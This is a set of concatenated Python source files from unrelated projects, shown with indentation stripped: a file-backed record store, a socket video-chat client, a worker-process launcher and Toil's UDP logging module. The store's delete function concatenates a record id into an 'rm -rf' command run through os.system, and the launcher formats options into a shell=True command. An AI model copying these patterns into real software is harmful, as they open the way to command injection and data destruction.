export += str(len(nodes))+"\n"
export += str(XT.cols())+"\n"
nfecol = ["fe"+str(i) for i in range(XT.cols()) ]
export += ";".join(nfecol)+"\n"
for nod in nodes:
i = fnamesindex[nod["label"]]
row = [str(columns[i])]
for j in range(XT.cols()):
row.append(str(XT.getValue(i,j)))
export += ";".join(row)
export += ";"+str(0.0)+"\n"
del XT
del fnamesindex
del layoutfeature
del nodes
#target_id = X.columnindex(target)
#print(export)
selft.set_header('Content-Type', 'text/plain')
selft.set_header("Content-Disposition", "attachment; filename=%s" % name+".data")
return export;
@staticmethod
def now():
return datetime.now().strftime("%Y-%m-%d %H:%M:%S")
class DataTransfer:
def __init__(self, data):
self.argms = {}
self.load(ujson.loads(data))
def load(self, data):
for k in self.__dict__:
if k in data:
setattr( self, k, (data[k]) )
"""
Database X
"""
class DBX:
@staticmethod
def find(dbs, collect, rdata):
rest = []
if Settings.MULIUSER == 0:
rest = DBFile.find(dbs, collect, rdata)
elif Settings.MULIUSER == 1:
rest = MongoDB.find(dbs, collect, rdata)
return rest
@staticmethod
def insert(dbs, collect, rdata):
rest = []
if Settings.MULIUSER == 0:
rest = DBFile.insert(dbs, collect, rdata)
elif Settings.MULIUSER == 1:
rest = MongoDB.insert(dbs, collect, rdata)
return rest
@staticmethod
def update(dbs, collect, queryid, rdata):
if Settings.MULIUSER == 0:
DBFile.update(dbs, collect, queryid, rdata)
elif Settings.MULIUSER == 1:
MongoDB.update(dbs, collect, queryid, rdata)
@staticmethod
def delete(dbs, collect, queryid):
if Settings.MULIUSER == 0:
DBFile.delete(dbs, collect, queryid)
elif Settings.MULIUSER == 1:
MongoDB.delete(dbs, collect, queryid)
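# Usage sketch (ids are hypothetical): DBX is a thin dispatcher, sending every
# call to the file-backed store in single-user mode and to MongoDB otherwise:
# rid = DBX.insert(DBS.DBGFF, "data", {"name": "iris"})
# rows = DBX.find(DBS.DBGFF, "data", {"_id": rid})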
"""
Database from file
"""
class DBFile:
@staticmethod
def openFile(pathf):
dfile = {}
try:
with open(pathf,'r') as fp:
dfile = ujson.load(fp)
except:
dfile = {}
return dfile
@staticmethod
def writeFile(pathf, rdata):
with open(pathf,'w') as fp:
ujson.dump(rdata, fp)
@staticmethod
def find(dbs, collect, rdata):
# print("rdata", rdata)
rdata["_id"] = str(rdata["_id"])
rest = []
f = Settings.DATA_PATH+rdata["_id"]+"/"+collect+".obj"
if os.path.isfile(f):
rest = [DBFile.openFile(f)]
return rest
@staticmethod
def insert(dbs, collect, rdata):
idud = DBFile.uid()
rdata["_id"] = idud
ndir = Settings.DATA_PATH+idud
Query.makedir(ndir)
DBFile.writeFile(ndir+"/"+collect+".obj", rdata)
return idud
@staticmethod
def update(dbs, collect, queryid, rdata):
queryid["_id"] = str(queryid["_id"])
db = DBFile.openFile(Settings.DATA_PATH+queryid["_id"]+"/"+collect+".obj")
for k, v in rdata.items():
db[k] = v
DBFile.writeFile(Settings.DATA_PATH+queryid["_id"]+"/"+collect+".obj", db)
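# DBX.delete dispatches to DBFile.delete, which was missing from this class;
# a minimal sketch (assumed semantics, mirroring Query.dropdataset's cleanup):
@staticmethod
def delete(dbs, collect, queryid):
# remove the record's directory, which holds its .obj document and data files
filefe = Settings.DATA_PATH+str(queryid["_id"])
os.system("rm -rf "+filefe)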
@staticmethod
def uid():
return uuid.uuid4().hex
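# Layout note (assumed from the code above): each record lives at
# DATA_PATH/<_id>/<collect>.obj, so a find() by _id is a single ujson load;
# uid() returns a uuid4 hex string such as "3f2c9a..." (value illustrative).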
|
socket_client_video.py | #v0.9 - Alpha 1
#v0.8
#import socket, videosocket
import socket
import errno
from threading import Thread, Event
from videofeed import VideoFeed
import cv2
import logging
import numpy as np
import zlib
HEADER_LENGTH = 10
NP_ROW_CHARS_SIZE = 4
NP_COL_CHARS_SIZE = 4
NP_DIM_CHARS_SIZE = 4
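# Framing sketch (inferred from the constants above): every message is prefixed
# with its byte length, left-justified in a fixed HEADER_LENGTH-byte ASCII field,
# e.g. b"hello" (5 bytes) travels as b"5         hello".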
client_socket_video_send = None
client_socket_video_recv = None
#vsock = None
thread_send_video = None
thread_listen_video = None
pill_to_kill_send_thread = None
pill_to_kill_listen_thread = None
stop_connection = False
videofeed = None
self_username = ''
window_list = []
#currently this is getting called from ConnectPage.
# But I think this needs to get called from the 'Start Video' button. Will need to check this logic.
# Connects to the server
def connect(ip, port, my_username, error_callback):
global client_socket_video_send
global client_socket_video_recv
#global vsock
global videofeed
global self_username
global pill_to_kill_send_thread
global pill_to_kill_listen_thread
global stop_connection
# Create a socket
# socket.AF_INET - address family, IPv4; some other possible ones are AF_INET6, AF_BLUETOOTH, AF_UNIX
# socket.SOCK_STREAM - TCP, connection-based; socket.SOCK_DGRAM - UDP, connectionless, datagrams; socket.SOCK_RAW - raw IP packets
stop_connection = False
try:
client_socket_video_send = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to a given ip and port
client_socket_video_send.connect((ip, port))
#vsock = videosocket.videosocket (client_socket_video_send)
except Exception as e:
# Connection error
#error_callback('Connection error: {}'.format(str(e)), False)
close_connection()
return -1
# Prepare username and header and send them
# We need to encode username to bytes, then count number of bytes and prepare header of fixed size, that we encode to bytes as well
try:
self_username = my_username
username = my_username.encode('utf-8')
keyword = 'SEND_SOCKET'.encode('utf-8')
sep_bytes = ':'.encode('utf-8')
username_header = f"{len(keyword+sep_bytes+username):<{HEADER_LENGTH}}".encode('utf-8')
#print('before client_socket_video_send.send(username_header + username)')
ret = client_socket_video_send.send(username_header + keyword+sep_bytes+username)
if(ret <= 0):
close_connection()
return -2
#print('after client_socket_video_send.send(username_header + username)')
except Exception as e:
# Connection error
#error_callback('Connection error: {}'.format(str(e)), False)
close_connection()
return -2
try:
client_socket_video_recv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to a given ip and port
client_socket_video_recv.connect((ip, port))
#vsock = videosocket.videosocket (client_socket_video_send)
except Exception as e:
# Connection error
#error_callback('Connection error: {}'.format(str(e)), False)
close_connection()
return -1
# Prepare username and header and send them
# We need to encode username to bytes, then count number of bytes and prepare header of fixed size, that we encode to bytes as well
try:
keyword = 'READ_SOCKET'.encode('utf-8')
username_header = f"{len(keyword+sep_bytes+username):<{HEADER_LENGTH}}".encode('utf-8')
#print('before client_socket_video_send.send(username_header + username)')
ret = client_socket_video_recv.send(username_header + keyword+sep_bytes+username)
if(ret <= 0):
close_connection()
return -2
#print('after client_socket_video_send.send(username_header + username)')
except Exception as e:
# Connection error
#error_callback('Connection error: {}'.format(str(e)), False)
close_connection()
return -2
try:
videofeed = VideoFeed(1,my_username,1)
if not (videofeed.capture.isOpened()):
videofeed = None
print('Cannot open self capture camera')
pill_to_kill_listen_thread = Event()
return -3
except Exception as e:
# Connection error
#error_callback('Connection error: {}'.format(str(e)), False)
return -3
pill_to_kill_listen_thread = Event()
pill_to_kill_send_thread = Event()
return 1
# Sends a message to the server - used to send DATA or CLOSING message
def send(message, header_size=HEADER_LENGTH):
# Encode message to bytes, prepare header and convert to bytes, like for username above, then send
message = message.encode('utf-8')
message_header = f"{len(message):<{header_size}}".encode('utf-8')
to_send = message_header + message
send_size = len(to_send)
tot_sent = 0
while tot_sent < send_size:
ret = client_socket_video_send.send(to_send[tot_sent:send_size])
tot_sent += ret
#client_socket_video_send.send(message_header + message)
def send_frame(message, frame_bytes, header_size=HEADER_LENGTH):
# Encode message to bytes, prepare header and convert to bytes, like for username above, then send
message = message.encode('utf-8')
message_header = f"{len(message+frame_bytes):<{header_size}}".encode('utf-8')
to_send = message_header + message + frame_bytes
send_size = len(to_send)
tot_sent = 0
while tot_sent < send_size:
ret = client_socket_video_send.send(to_send[tot_sent:send_size])
tot_sent += ret
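# Wire layout of one frame as produced by these two helpers (sizes illustrative):
# send('DATA') -> b"4         DATA"
# send_frame("480,640,3,", zbytes) -> b"<total len> 480,640,3,<zlib-compressed pixels>"
# The receiver splits the payload on the first three commas to recover the shape.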
def receive_message(receive_size=HEADER_LENGTH):
try:
# Receive our "header" containing message length, it's size is defined and constant
#message_header = client_socket.recv(receive_size)
message_header = ''.encode('utf-8')
totrec = 0
while totrec<receive_size :
chunk = client_socket_video_recv.recv(receive_size - totrec)
if not chunk:
# an empty bytes object means the peer closed the connection
print("In receive_message: received 0 bytes during receive of data size.")
#raise RuntimeError("Socket connection broken")
return False
totrec += len(chunk)
message_header = message_header + chunk
# If we received no data, client gracefully closed a connection, for example using socket.close() or socket.shutdown(socket.SHUT_RDWR)
if not len(message_header):
return False
# Convert header to int value
message_length = int(message_header.decode('utf-8').strip())
message_data = ''.encode('utf-8')
totrec = 0
while totrec<message_length :
chunk = client_socket_video_recv.recv(message_length - totrec)
if not chunk:
# an empty bytes object means the peer closed the connection
print("In receive_message: received 0 bytes during receive of data.")
#raise RuntimeError("Socket connection broken")
return False
totrec += len(chunk)
message_data = message_data + chunk
if not len(message_data):
return False
# Return an object of message header and message data
#return {'header': message_header, 'data': client_socket.recv(message_length)}
return {'header': message_header, 'data': message_data}
except:
# If we are here, client closed connection violently, for example by pressing ctrl+c on his script
# or just lost his connection
# socket.close() also invokes socket.shutdown(socket.SHUT_RDWR) what sends information about closing the socket (shutdown read/write)
# and that's also a cause when we receive an empty message
return False
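# Usage sketch: callers loop on receive_message(); each call yields one framed
# message as {'header': <length bytes>, 'data': <payload bytes>}, or False once
# the peer has closed the connection:
# msg = receive_message()
# if msg is not False:
#     payload = msg['data']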
def close_connection():
global client_socket_video_send
global client_socket_video_recv
global videofeed
stop_video_comm()
if( client_socket_video_send != None ):
client_socket_video_send.close()
if( client_socket_video_recv != None ):
client_socket_video_recv.close()
#videofeed = None
client_socket_video_send = None
client_socket_video_recv = None
def stop_video_comm():
global stop_connection
stop_connection = True
#wait for the send thread to close
try:
while((thread_send_video !=None) and (thread_send_video.is_alive())):
print('waiting for send thread to become None')
except Exception as e:
print('stopped send thread')
print('video send thread stopped')
if((videofeed != None) and (videofeed.capture.isOpened())):
videofeed.capture.release()
cv2.destroyWindow(self_username)
#send CLOSING
if( client_socket_video_send != None ):
send('CLOSING')
try:
while((thread_listen_video != None) and (thread_listen_video.is_alive())):
print('waiting for listen thread to become None')
except Exception as e:
print('stopped listen thread')
print('video listen thread stopped')
#cv2.destroyAllWindows()
def start_sending_video(send_callback, error_callback):
global thread_send_video
if (videofeed.capture.isOpened()):
#print('before Thread send_video')
thread_send_video = Thread(target=send_video, args=(send_callback, error_callback), daemon=True)
thread_send_video.start()
#print('after Thread send_video')
def send_video(send_callback, error_callback):
#global vsock
global videofeed
global pill_to_kill_send_thread
#while True:
while not pill_to_kill_send_thread.wait(0):
try:
#ret = cv2.getWindowProperty(self_username, cv2.WND_PROP_VISIBLE)
#if(ret > 0):
"""x = cv2.waitKey(1)
if(x == 27):
cv2.destroyAllWindows()
break"""
frame=videofeed.get_frame()
videofeed.set_frame(frame)
#get_frame returns an np.ndarray; convert it to bytes and then send the bytes
#we also need to send the shape of the nparray so that it can be reconstructed on receive
#if(client_socket_video_send != None):
"""shape_row_bytes = (str(frame.shape[0])).encode('utf-8')
message_header = f"{len(shape_row_bytes):<{NP_ROW_CHARS_SIZE}}".encode('utf-8')
client_socket_video_send.send(message_header + shape_row_bytes)
shape_col_bytes = (str(frame.shape[1])).encode('utf-8')
message_header = f"{len(shape_col_bytes):<{NP_COL_CHARS_SIZE}}".encode('utf-8')
client_socket_video_send.send(message_header + shape_col_bytes)
shape_dim_bytes = (str(frame.shape[2])).encode('utf-8')
message_header = f"{len(shape_dim_bytes):<{NP_DIM_CHARS_SIZE}}".encode('utf-8')
client_socket_video_send.send(message_header + shape_dim_bytes)"""
"""shape_str = f"{frame.shape[0]},{frame.shape[1]},{frame.shape[2]}"
send(shape_str, HEADER_LENGTH)"""
#shape_str_bytes = shape_str.encode('utf-8')
#message_header = f"{len(shape_str_bytes):<{HEADER_LENGTH}}".encode('utf-8')
#client_socket_video_send.send(message_header + shape_str_bytes)
#now send the entire nparray as bytes
send_bytes = frame.tobytes()
send_bytes = zlib.compress(send_bytes, -1)
#send_size = (frame.shape[0] * frame.shape[1] * frame.shape[2])
#compress the video bytes - 9 is max compression and 1 is lowest compression, -1 is default (6)
#compressed_send_bytes = zlib.compress(send_bytes, 9)
#compressed_send_bytes = zlib.compress(send_bytes, -1)
#send_size = len(send_bytes)
#send_size = len(compressed_send_bytes)
#send(str(send_size))
#frame_size = f"{frame.shape[0]},{frame.shape[1]},{frame.shape[2]},{send_size}"
frame_size = f"{frame.shape[0]},{frame.shape[1]},{frame.shape[2]},"
#send(frame_size)
send('DATA')
send_frame(frame_size, send_bytes)
"""totalsent = 0
while totalsent < send_size :
#sent = client_socket_video_send.send(send_bytes)
sent = client_socket_video_send.send(compressed_send_bytes)
if sent == 0:
print("client_socket_video_send.send(send_bytes): During sending frame Socket connection broken. breaking the current send operation")
#raise RuntimeError("Socket connection broken")
break #this means we will exit the thread and sending will stop
totalsent += sent"""
videofeed.set_frame(frame)
if(stop_connection == True):
#print('before pill_to_kill_send_thread.set()')
pill_to_kill_send_thread.set()
#print('after pill_to_kill_send_thread.set()')
break
#else:
# cv2.destroyAllWindows()
# break
except Exception as e:
# Any other exception - something happened, exit
print('Failed in send_video. Stopping the send thread: ' + str(e))
#cv2.destroyWindow(self_username)
#vsock = None
#videofeed = None
#client_socket_video_send.close()
#error_callback('Reading error: {}'.format(str(e)), False)
#break
#if we are out of the while loop, that means we are closing the socket. We need to tell the server,
# and the server will inform the other clients
#we will first send a broadcast message to let the server know we are closing the connection
#the server in turn will notify all the clients that I am closing the connection
#clients who receive the closing message in the listener will close that user's video window
#and then they will continue to wait for a new message from the server
#send('CLOSING')
print('Stopped send video thread')
#pill_to_kill_send_thread = None
# Starts listening function in a thread
# incoming_message_callback - callback to be called when new message arrives
# error_callback - callback to be called on error
#def start_listening(incoming_message_callback, error_callback):
def start_listening(listen_callback, error_callback):
global thread_listen_video
#print('before Thread listen')
thread_listen_video = Thread(target=listen, args=(listen_callback, error_callback), daemon=True)
thread_listen_video.start()
#print('after Thread listen')
# Listens for incoming messages
def listen(listen_callback, error_callback):
#global vsock
#global videofeed
global pill_to_kill_listen_thread
global pill_to_kill_send_thread
global window_list
#global thread_listen_video
#global thread_send_video
# Now we want to loop over received messages (there might be more than one) and print them
#while True:
while not pill_to_kill_listen_thread.wait(0):
try:
#while True:
#if((vsock != None) and (videofeed != None)):
#first get the username
# Receive our "header" containing username length, it's size is defined and constant
"""username_header = client_socket_video_send.recv(HEADER_LENGTH)
# If we received no data, server gracefully closed a connection, for example using socket.close() or socket.shutdown(socket.SHUT_RDWR)
if not len(username_header):
#error_callback('Connection closed by the server', False)
print('Connection closed by server: if not len(username_header):')
continue
# Convert header to int value
username_length = int(username_header.decode('utf-8').strip())
#print('after username_length: ' + str(username_length))
# Receive and decode username
username = client_socket_video_send.recv(username_length).decode('utf-8')
#print('client_socket_video_send.recv: username= ' + username)"""
username_dict = receive_message()
if(username_dict is False):
print('username_dict is False. continuing...')
continue
keyword_dict = receive_message()
if(keyword_dict is False):
print('keyword_dict is False. continuing...')
continue
username = (username_dict['data'].decode('utf-8')).strip()
"""keyword_header = client_socket_video_send.recv(HEADER_LENGTH)
if not len(keyword_header):
#error_callback('Connection closed by the server', False)
print('Connection closed by server in keyword_header = client_socket_video_send.recv(HEADER_LENGTH)')
continue
# Convert header to int value
keyword_length = int(keyword_header.decode('utf-8').strip())
keyworkd_message = client_socket_video_send.recv(keyword_length).decode('utf-8')"""
keyword_message = (keyword_dict['data'].decode('utf-8')).strip()
if(keyword_message.upper() == 'CLOSING'):
#we need to close the video window of the specific sender
#if(cv2.getWindowProperty(username + '_receiver', 0) == 0):
if (username + '_receiver') in window_list:
window_list.remove(username + '_receiver')
cv2.destroyWindow(username + '_receiver')
elif(keyword_message.upper() == 'ACK_CLOSED'):
for each_window in window_list:
cv2.destroyWindow(each_window)
window_list.clear()
pill_to_kill_listen_thread.set()
break
elif(keyword_message.upper() == 'DATA'):
#now get the shape of the nparray. shape is (rows, cols, dim), e.g. shape: (480, 640, 3)
#print('before client_socket_video_send.recv to get row')
"""shape_size_header = client_socket_video_send.recv(HEADER_LENGTH)
shape_size_length = int(shape_size_header.decode('utf-8').strip())
shape_size_str = client_socket_video_send.recv(shape_size_length).decode('utf-8')"""
shape_dict = receive_message()
if(shape_dict is False):
print('shape_dict is False. continuing...')
continue
#shape_size_str = (shape_dict['data'].decode('utf-8')).strip()
#shape_size_split = shape_size_str.split(',')
shape_size_split = shape_dict['data'].split(','.encode('utf-8'), 3)
shape_row_int = int(shape_size_split[0].decode('utf-8'))
shape_col_int = int(shape_size_split[1].decode('utf-8'))
shape_dim_int = int(shape_size_split[2].decode('utf-8'))
#message_size = int(shape_size_split[3])
frame = shape_size_split[3]
"""shape_row_header = client_socket_video_send.recv(NP_ROW_CHARS_SIZE)
shape_row_length = int(shape_row_header.decode('utf-8').strip())
shape_row_int = int(client_socket_video_send.recv(shape_row_length).decode('utf-8'))
#print('before client_socket_video_send.recv to get col')
shape_col_header = client_socket_video_send.recv(NP_COL_CHARS_SIZE)
shape_col_length = int(shape_col_header.decode('utf-8').strip())
shape_col_int = int(client_socket_video_send.recv(shape_col_length).decode('utf-8'))
#print('before client_socket_video_send.recv to get dim')
shape_dim_header = client_socket_video_send.recv(NP_DIM_CHARS_SIZE)
shape_dim_length = int(shape_dim_header.decode('utf-8').strip())
shape_dim_int = int(client_socket_video_send.recv(shape_dim_length).decode('utf-8'))
#print('after client_socket_video_send.recv to get dim')"""
#get the size of the bytes array
"""message_size_header = client_socket_video_send.recv(HEADER_LENGTH)
message_size_length = int(message_size_header.decode('utf-8').strip())
message_size = int(client_socket_video_send.recv(message_size_length).decode('utf-8'))"""
"""message_size_dict = receive_message(client_socket_video_send, HEADER_LENGTH)
if(message_size_dict is False):
print('message_size_dict is False. continuing...')
continue
message_size = int((message_size_dict['data'].decode('utf-8')).strip())"""
"""totrec = 0
frame = ''.encode('utf-8')
#message_size = shape_row_int*shape_col_int*shape_dim_int
while totrec<message_size :
chunk = client_socket_video_recv.recv(message_size - totrec)
if chunk == '':
print("client_socket_video_send.recv(message_size - totrec): During receiving frame socket connection broken, Breaking the current receive operation")
#raise RuntimeError("Socket connection broken")
break
totrec += len(chunk)
frame = frame + chunk"""
#print('after frame = vsock.vreceive()')
# we received bytes which we need to convert to np.ndarray
""" sample to convert nparray to bytes and bytes to nparray
In [3]: i = np.arange(28*28).reshape(28, 28)
In [4]: k = i.tobytes()
In [5]: y = np.frombuffer(k, dtype=i.dtype)
In [6]: y.shape
Out[6]: (784,)
In [7]: np.array_equal(y.reshape(28, 28), i)
Out[7]: True
dtype('uint8')
"""
if(len(frame) > 0):
#decompress the recived frame
frame = zlib.decompress(frame)
received_nparray = np.frombuffer(frame, dtype=np.uint8)
received_nparray = received_nparray.reshape(shape_row_int, shape_col_int, shape_dim_int)
#cv2.imshow(username + '_receiver', frame)
# Now create OpenCV window for this username if not already created
#if(cv2.getWindowProperty(username + '_receiver', 0) < 0):
#if( cv2.getWindowProperty(username + '_receiver',cv2.WND_PROP_VISIBLE) <= 0):
#print('cv2.getWindowProperty < 0')
#cv2.namedWindow(username + '_receiver', cv2.WINDOW_AUTOSIZE)
#print('after cv2.namedWindow(username + \'_receiver\'')
if (username + '_receiver') not in window_list:
window_list.append(username + '_receiver')
cv2.namedWindow(username + '_receiver', cv2.WINDOW_AUTOSIZE)
cv2.imshow(username + '_receiver', received_nparray)
x = cv2.waitKey(1)
#print('after cv2.imshow(username + \'_receiver\'')
except Exception as e:
# Any other exception - something happened, exit
print('Failed in listen: ' + str(e))
#cv2.destroyWindow(self_username)
#vsock = None
#videofeed = None
#client_socket_video_send.close()
#error_callback('Reading error: {}'.format(str(e)), False)
#break
#since we are out of the while loop, a closing message was received or the thread was asked to stop
pill_to_kill_listen_thread.set()
if(pill_to_kill_send_thread != None):
pill_to_kill_send_thread.set()
print('Stopped listen video thread')
|
run_workers.py | #!/usr/bin/env python3
'''
A script for running worker processes
Copyright 2012-2020 Codinuum Software Lab <https://codinuum.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import os
import sys
import subprocess
import threading
import select
import time
import logging
from .common import setup_logger
logger = logging.getLogger()
#####
TIMEOUT = 5
BUFSIZE = 0 # unbuffered
LOG_BUFSIZE = 256
#####
def spawn(cmd):
sproc = subprocess.Popen(cmd,
bufsize=BUFSIZE,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True)
return sproc
def mklogname(cmd_name, wid):
(base, ext) = os.path.splitext(cmd_name)
return 'log.worker.%s.%s' % (base, wid)
def dump_log(cmd_name, wid, sout_serr, wdir='.', timeout=TIMEOUT):
sout, serr = sout_serr
log = os.path.join(wdir, mklogname(cmd_name, wid))
f = open(log, 'wb')
running = True
outs = [sout, serr]
nouts = len(outs)
max_count = LOG_BUFSIZE
prev_out = None
out = None
count = 0
nclosed = 0
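# The loop below drains stdout/stderr one byte at a time. It stays on the
# stream it read last for up to LOG_BUFSIZE bytes, then yields to the other
# ready stream, so a chatty pipe cannot starve the other one.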
while running:
try:
(ready_outs, x0, x1) = select.select(outs, [], [], timeout)
n = len(ready_outs)
if prev_out:
if prev_out in ready_outs:
if count < max_count:
out = prev_out
count += 1
else:
if n > 1:
i = ready_outs.index(prev_out)
if i < n - 1:
out = ready_outs[i+1]
else:
out = ready_outs[0]
count = 0
else:
out = prev_out
elif n > 0:
out = ready_outs[0]
count = 0
else:
out = None
elif n > 0:
out = ready_outs[0]
count = 0
else:
out = None
prev_out = out
if out:
dat = out.read(1)
if dat:
f.write(dat)
else:
outs.remove(out)
nclosed += 1
if nclosed >= nouts:
running = False
logger.info('[wid:%s] finished.' % wid)
except BaseException as e:
logger.error('{}'.format(e))
break
f.close()
def store_carg(option, opt_str, value, parser):
setattr(parser.values, option.dest, getattr(parser.values, option.dest)+' '+value)
def main():
from optparse import OptionParser
usage = 'usage: %prog [OPTIONS] [TARGET_DIR]'
optparser = OptionParser(usage)
optparser.add_option('-c', '--cmd', dest='cmd',
help='set command to CMD', metavar='CMD')
optparser.add_option('-a', '--arg', action='callback', callback=store_carg, nargs=1,
dest='cargs', type='string', default='',
help='set ARGS for sub command', metavar='ARGS')
optparser.add_option('-n', '--nprocs', dest='nprocs', action='store', type='int',
help='set nprocs to N', metavar='N', default=2)
optparser.add_option('-d', '--debug', action='store_true', dest='debug',
help='enable debug output')
(opt, args) = optparser.parse_args()
log_level = logging.INFO
if opt.debug:
log_level = logging.DEBUG
setup_logger(logger, log_level)
target_dir = '.'
if args:
target_dir = args[0]
dist_dir = os.path.dirname(sys.argv[0])
logger.info('command: "%s"' % opt.cmd)
w_cmd = ''
if opt.cmd:
w_cmd = os.path.join(dist_dir, opt.cmd)
else:
logger.error('no command specified')
out_tbl = {}
for i in range(opt.nprocs):
wid = str(i)
logger.info('worker id: %s' % wid)
if w_cmd:
arg = ''
if opt.cargs:
arg = opt.cargs
engine_opt = ''
# if opt.engine:
# engine_opt = '-e %s' % opt.engine
cmd = '%s %s -c work -w %s %s %s' % (w_cmd, arg, wid, engine_opt, target_dir)
logger.info('cmd: "%s"' % cmd)
p = spawn(cmd)
time.sleep(1)
out_tbl[wid] = (p.stdout, p.stderr)
for wid in out_tbl.keys():
th = threading.Thread(target=dump_log, args=(opt.cmd, wid, out_tbl[wid], target_dir))
th.start()
if __name__ == '__main__':
main()
|
realtimeLogger.py | # Copyright (C) 2015-2021 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements a real-time UDP-based logging system that user scripts can use for debugging."""
import json
import logging
import logging.handlers
import os
import os.path
import socketserver as SocketServer
import threading
from types import TracebackType
from typing import Any, Optional, Type, TYPE_CHECKING
from toil.lib.misc import get_public_ip
from toil.statsAndLogging import set_log_level
if TYPE_CHECKING:
from toil.batchSystems.abstractBatchSystem import AbstractBatchSystem
logger = logging.getLogger(__name__)
class LoggingDatagramHandler(SocketServer.BaseRequestHandler):
"""
Receive logging messages from the jobs and display them on the leader.
Uses bare JSON message encoding.
"""
def handle(self) -> None:
"""
Handle a single message. SocketServer takes care of splitting out the messages.
Messages are JSON-encoded logging module records.
"""
# Unpack the data from the request
data, socket = self.request
try:
# Parse it as JSON
message_attrs = json.loads(data.decode('utf-8'))
# Fluff it up into a proper logging record
record = logging.makeLogRecord(message_attrs)
if isinstance(record.args, list):
# Going through JSON turned tuples into lists. Lazy formatting
# means this might have happened to all the arguments. We need
# to fix this at least for the root list of format string
# arguments, or formatting will fail
#
# TODO: Protect the arguments better by actually pickling
# instead of using JSON?
#
# TODO: Format the message on the sending side?
record.args = tuple(record.args)
except:
# Complain someone is sending us bad logging data
logging.error("Malformed log message from {}".format(self.client_address[0]))
else:
# Log level filtering should have been done on the remote end. The handle() method
# skips it on this end.
logger.handle(record)
class JSONDatagramHandler(logging.handlers.DatagramHandler):
"""
Send logging records over UDP serialized as JSON.
They have to fit in a single UDP datagram, so don't try to log more than 64kb at once.
"""
def makePickle(self, record: logging.LogRecord) -> bytes:
"""
Actually, encode the record as bare JSON instead.
"""
return json.dumps(record.__dict__).encode('utf-8')
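# Size sanity note (illustrative): a record serialized this way is typically a
# few hundred bytes of JSON, comfortably below the single-UDP-datagram limit
# mentioned in the class docstring.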
class RealtimeLoggerMetaclass(type):
"""
Metaclass for RealtimeLogger that lets you do things like RealtimeLogger.warning(),
RealtimeLogger.info(), etc.
"""
def __getattr__(self, name: str) -> Any:
"""
If a real attribute can't be found, try one of the logging methods on the actual logger
object.
"""
return getattr(self.getLogger(), name)
class RealtimeLogger(metaclass=RealtimeLoggerMetaclass):
"""
Provides a logger that logs over UDP to the leader. To use in a Toil job, do:
>>> from toil.realtimeLogger import RealtimeLogger
>>> RealtimeLogger.info("This logging message goes straight to the leader")
That's all a user of Toil would need to do. On the leader, Job.Runner.startToil()
automatically starts the UDP server by using an instance of this class as a context manager.
"""
# The names of all environment variables used by this class are prefixed with this string
envPrefix = "TOIL_RT_LOGGING_"
# Avoid duplicating the default level everywhere
defaultLevel = 'INFO'
# State maintained on server and client
lock = threading.RLock()
# Server-side state
# The leader keeps a server and thread
loggingServer = None
serverThread = None
initialized = 0
# Client-side state
logger = None
@classmethod
def _startLeader(cls, batchSystem: 'AbstractBatchSystem', level: str = defaultLevel) -> None:
with cls.lock:
if cls.initialized == 0:
cls.initialized += 1
if level:
logger.info('Starting real-time logging.')
# Start up the logging server
cls.loggingServer = SocketServer.ThreadingUDPServer(
server_address=('0.0.0.0', 0),
RequestHandlerClass=LoggingDatagramHandler)
# Set up a thread to do all the serving in the background and exit when we do
cls.serverThread = threading.Thread(target=cls.loggingServer.serve_forever)
cls.serverThread.daemon = True
cls.serverThread.start()
# Set options for logging in the environment so they get sent out to jobs
ip = get_public_ip()
port = cls.loggingServer.server_address[1]
def _setEnv(name: str, value: str) -> None:
name = cls.envPrefix + name
os.environ[name] = value
batchSystem.setEnv(name)
_setEnv('ADDRESS', '%s:%i' % (ip, port))
_setEnv('LEVEL', level)
else:
logger.debug('Real-time logging disabled')
else:
if level:
logger.warning('Ignoring nested request to start real-time logging')
@classmethod
def _stopLeader(cls) -> None:
"""
Stop the server on the leader.
"""
with cls.lock:
assert cls.initialized > 0
cls.initialized -= 1
if cls.initialized == 0:
if cls.loggingServer:
logger.info('Stopping real-time logging server.')
cls.loggingServer.shutdown()
cls.loggingServer = None
if cls.serverThread:
logger.info('Joining real-time logging server thread.')
cls.serverThread.join()
cls.serverThread = None
for k in list(os.environ.keys()):
if k.startswith(cls.envPrefix):
os.environ.pop(k)
@classmethod
def getLogger(cls) -> logging.Logger:
"""
Get the logger that logs real-time to the leader.
Note that if the returned logger is used on the leader, you will see the message twice,
since it still goes to the normal log handlers, too.
"""
# Only do the setup once, so we don't add a handler every time we log. Use a lock to do
# so safely even if we're being called in different threads. Use double-checked locking
# to reduce the overhead introduced by the lock.
if cls.logger is None:
with cls.lock:
if cls.logger is None:
cls.logger = logging.getLogger('toil-rt')
try:
level = os.environ[cls.envPrefix + 'LEVEL']
except KeyError:
# There is no server running on the leader, so suppress most log messages
# and skip the UDP stuff.
cls.logger.setLevel(logging.CRITICAL)
else:
# Adopt the logging level set on the leader.
set_log_level(level, cls.logger)
try:
address = os.environ[cls.envPrefix + 'ADDRESS']
except KeyError:
pass
else:
# We know where to send messages to, so send them.
host, port = address.split(':')
cls.logger.addHandler(JSONDatagramHandler(host, int(port)))
return cls.logger
def __init__(self, batchSystem: 'AbstractBatchSystem', level: str = defaultLevel):
"""
A context manager that starts up the UDP server.
Should only be invoked on the leader. Python logging should have already been configured.
This method takes an optional log level, as a string level name, from the set supported
by bioio. If the level is None, False or the empty string, real-time logging will be
disabled, i.e. no UDP server will be started on the leader and log messages will be
suppressed on the workers. Note that this is different from passing level='OFF',
which is equivalent to level='CRITICAL' and does not disable the server.
"""
super().__init__()
self.__level = level
self.__batchSystem = batchSystem
def __enter__(self) -> None:
RealtimeLogger._startLeader(self.__batchSystem, level=self.__level)
# noinspection PyUnusedLocal
